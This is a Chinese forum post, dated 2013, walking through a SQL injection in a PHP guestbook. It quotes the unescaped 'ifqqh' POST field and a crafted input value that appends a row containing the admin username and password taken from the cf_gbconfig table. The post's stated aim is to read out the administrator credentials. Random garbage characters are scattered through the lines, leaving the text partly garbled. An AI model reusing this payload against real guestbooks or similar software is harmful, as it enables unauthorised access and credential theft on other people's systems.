留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
+ T) y: i& C+ H t
7 e& w1 b) [$ Q1 g/ j/ E$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。* e; A" b8 l" J
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响- J, {0 f* m# R4 e5 q: c: k U
2 q3 y7 h b3 I( Y2 {
提交的时候把ifqqh的值改一下。变成5 p+ }& i; c8 L
8 A: X3 \- ]3 W% T- a<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />' ?6 r8 f, o/ x' F
8 n, n. l) D5 w+ r
这样SQL插入语句就变了." T' x( h/ c" S9 \
2 t& y, H) }, f U9 X5 u' Y- t S
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
, o0 |7 [: c S: u' o; Z2 G; E' q, k1 _; ^8 C, O& P
构造了另外一句SQL。并且把帐号密码读出来。9 r) v5 m8 _/ l" n* q& \% K
; v4 \3 j0 q6 U" C) F" l3 F; P/ _& e
|
发表于 2013-2-19 08:10:11
收藏
支持
反对